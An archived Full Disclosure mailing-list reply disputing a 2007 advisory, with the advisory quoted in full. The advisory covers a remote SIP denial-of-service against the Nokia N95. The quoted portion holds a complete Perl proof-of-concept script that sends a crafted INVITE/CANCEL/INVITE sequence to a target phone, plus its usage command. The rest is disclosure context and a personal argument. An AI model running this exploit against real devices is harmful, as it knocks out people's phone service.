Full Disclosure mailing list archives
Re: Nokia N95 cellphone remote DoS using the SIP Stack
From: nnp <version5 () gmail com>
Date: Wed, 5 Dec 2007 14:10:15 -0800
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I think you're missing his point. In fact I might be too but my take on it is this.... you'd think two PhD's and a PhD student might be able to do something a little more advanced than running a fuzzer and reporting DoS conditions. Do you guys even investigate the DoS to determine the root cause? If ye did then that might be OK and considered PhD level. I would think that a PhD level interpretation of this area might be for instance..... running a fuzzer against a hardware phone and then getting some form of code execution. Yes? No? Maybe? It looks to me like someone one of you guys built a VoIP fuzzer (is it even a VoIP fuzzer or just SIP?) and for the remainder of your doctoral studies you will be purchasing equipment and hitting the 'Fuzz' button. As I said, if you're gonna be submitting this kind of stuff to every list you can then at least investigate the root cause, maybe then it'll provide some slightly more interesting reading and perhaps benefit your thesis. nnp -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (Darwin) Comment: http://firegpg.tuxfamily.org iD8DBQFHV5DhbP10WPHfgnQRAtMNAJ43x7ZJDyVn0njZi2zTMQIQQoB6bgCeK8k7 addmL2c5Jm4LrlQvahnBrgY= =YX4u -----END PGP SIGNATURE----- On Dec 5, 2007 11:57 AM, <state () loria fr> wrote:
hi Reepex, I do not understand why are frustrated about a computer science degree. Maybe, someone got dropped out of a degree programm and some psychological trauma gets activated when seeing a Ph.D? If you like it or not, in order to get a computer science degree, you will have to take classes, and most classes are taught by Ph.Ds. I will not argue with you on why I use the Ph.D in my signature, but if you really want to know, look at our research papers published in academic journals/conferences. (If you do not find them, I can send them to you). If you will ever understand the contents, then you will understand what are our credentials..:) This will probably never happen. At least, I use a signature and a real name and do not hide behind a gmail account. Meanwhile try yourself to find at least one vulnerability and enjoy Perl programming, it seemes your computer science skills are somehow in this area :) Greetings RS Selon reepex <reepex () gmail com>:So almighty Phd what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perlscriptsto exploit DoS conditions' does this properly summarize your phd credentials? I guess you could tack on 'after writing the crappy scripts, floodmailinglists with our crap, and get made fun of' I am sure you will serve the academic community great one day when teach "hacking" classes revolving around the latest editions of hackingexposedOn Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:Nokia N95 cellphone remote DoS using the SIP Stack Severity: High – Denial of Service Hardware: Nokia N95 Firmware: Tested version: Nokia RM-159 V 12.0.013 Notification: Vulnerability found: 11 September 2007 Contact Nokia Support: 12 September 2007 / None reply Contact Nokia Security Support: 19 September 2007 / None reply Vulnerability Synopsis: If the device has the SIP Phone client activated, a sequence of SIP messages turn the device in an inconsistent state where the user isnotableto operate it anymore until it reboots. The sequence of messages consists in 2 different SIP Dialogs where the first initiates an INVITE transaction but immediately closes it (in an anticipated manner). While, the second transaction initiates a normalINVITEtransaction that trigger the vulnerability of the target. The sequence of messages is illustrated below. X ------------------------- INVITE -----------------------> Nokiav12 X <---------------------- 100 Trying ---------------------- Nokiav12 X ------------------------- CANCEL -----------------------> Nokiav12 X <----------------- OK (to the Cancel) ------------------- Nokiav12 X <---------------- 487 Request Terminated ---------------- Nokiav12 --------New Dialog-------- X ------------------------- INVITE -----------------------> Nokiav12 X <---------------------- 100 Trying ---------------------- Nokiav12 X <---------------------- 180 Trying ---------------------- Nokiav12 ---- The device does not work properly anymore ---- Impact: A remote entity can take down all the services of the cell phone Resolution: As we did not get any proper reply from Nokia about the subject, thebestway will be to disable the SIP Client Credits: Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team atINRIALorraine, using KiF the Madynes VoIP fuzzer. http://madynes.loria.fr/ Proof of Concept: A perl script (nokiav12.pl) is attached to this mail. Before launching it, the SIP phone has to be initialed in the target device Command: perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername> Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu #!/usr/bin/perl ################################################## # Vulnerabily discovered using KiF ~ Kiph # # # # Authors: # # Humberto J. Abdelnur (Ph.D Student) # # Radu State (Ph.D) # # Olivier Festor (Ph.D) # # # # Madynes Team, LORIA - INRIA Lorraine # # http://madynes.loria.fr # ################################################## use IO::Socket::INET; use String::Random; die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" unless ($ARGV[3]); $targetUser = $ARGV[1]; $targetIP = $ARGV[0]; $attackerUser = $ARGV[3]; $attackerIP= $ARGV[2]; $socket=new IO::Socket::INET->new( Proto=>'udp', PeerPort=>5060, PeerAddr=>$targetIP, LocalPort=>5060); $foo = new String::Random; $callid= $foo->randpattern("CCccnCn"); $cseq = $foo->randregex('\d\d\d\d'); $sdp = "v=0\r o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r s=-\r c=IN IP4 $attackerIP\r t=0 0\r m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r a=sendrecv\r a=ptime:20\r a=maxptime:200\r a=fmtp:96 mode-change-neighbor=1\r a=fmtp:18 annexb=no\r a=fmtp:98 0-15\r a=rtpmap:96 AMR/8000/1\r a=rtpmap:0 PCMU/8000/1\r a=rtpmap:8 PCMA/8000/1\r a=rtpmap:97 iLBC/8000/1\r a=rtpmap:18 G729/8000/1\r a=rtpmap:98 telephone-event/8000/1\r a=rtpmap:13 CN/8000/1\r "; $sdplen= length $sdp; $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r From: <sip:$attackerUser\@$attackerIP>;tag=1\r To: <sip:$targetUser\@$targetIP>\r Call-ID: $callid\@$attackerIP\r CSeq: $cseq INVITE\r Max-Forwards: 70\r Contact: <sip:$attackerUser\@$attackerIP>\r Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r Content-Type: application/sdp\r Content-Length: $sdplen\r \r $sdp"; $socket->send($msg); $text = ''; while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){ $socket->recv($text,1024,0); } $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r From: <sip:$attackerUser\@$attackerIP>;tag=1\r To: <sip:$targetUser\@$targetIP>;tag=1\r Call-ID: $callid\@$attackerIP\r CSeq: $cseq CANCEL\r Max-Forwards: 70\r Content-Length: 0\r \r "; $socket->send($msg); time.sleep(1); $callid= $foo->randpattern("CCccnCn"); $cseq = $foo->randregex('\d\d\d\d'); $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r From: <sip:$attackerUser\@$attackerIP>;tag=2\r To: <sip:$targetUser\@$targetIP>\r Call-ID: $callid\@$attackerIP\r CSeq: $cseq INVITE\r Contact: <sip:$attackerUser\@$attackerIP>\r Max-Forwards: 70\r Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r Content-Type: application/sdp\r Content-Length: $sdplen\r \r $sdp"; $socket->send($msg); No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007 19:31 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- http://www.smashthestack.org http://www.unprotectedhex.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Nokia N95 cellphone remote DoS using the SIP Stack Radu State (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack nnp (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack Humberto Abdelnur (Dec 06)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)